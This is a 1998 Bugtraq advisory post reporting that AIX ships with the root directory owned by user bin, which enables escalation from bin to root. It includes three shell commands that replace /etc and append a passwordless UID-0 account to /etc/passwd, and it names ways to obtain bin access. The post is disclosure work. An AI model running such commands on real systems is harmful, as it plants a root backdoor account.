[6891] in bugtraq
AIX : "/" is owned by bin.bin
daemon@ATHENA.MIT.EDU (Yaron Yanay)
Mon Jun 1 16:46:16 1998
Date: Mon, 1 Jun 1998 21:13:29 +0300
Reply-To: yarony@yarony.il.eu.org
From: Yaron Yanay <yarony@YARONY.IL.EU.ORG>
To: BUGTRAQ@NETSPACE.ORG
Shalom,
I have verified a problem with "/" permission on AIX versions:
3.2.5.0 , 4.1.4.0 4.2.1.0, and I guess on every version of AIX.
The problem is that the owner of "/" is user bin instead of user root.
Which means that if one manages to get "bin" permissions he might get
root permissions by:
> mv -r /etc /etc.old
> cp -r /etc.old /etc
> echo "yarony::0:0:Yaron:/:/bin/tcsh">> /etc/passwd
or something like that.
And to get bin permissions one should exploit the current version of
sendmail or use mis-configured NFS server, or exploit a buffer overflow in
/usr/bin/nslookup (the only suid bin in AIX ,and it suid only in AIX 4.1.5)
I have informed AIX about it a month ago. They told me that it doesn't
look like this is going to be changed. The reason was that all my ideas
about how to get bin permissions were by exploiting mis-configured system.
Yours,
Yaron.
--
Yaron Yanay. email:yarony@yarony.il.eu.org , http://yarony.il.eu.org
Chief Teaching Assistant - Computer Security (236350) - Technion CS Department
Unix Security Supervisor - Computer Center - Haifa University - Israel
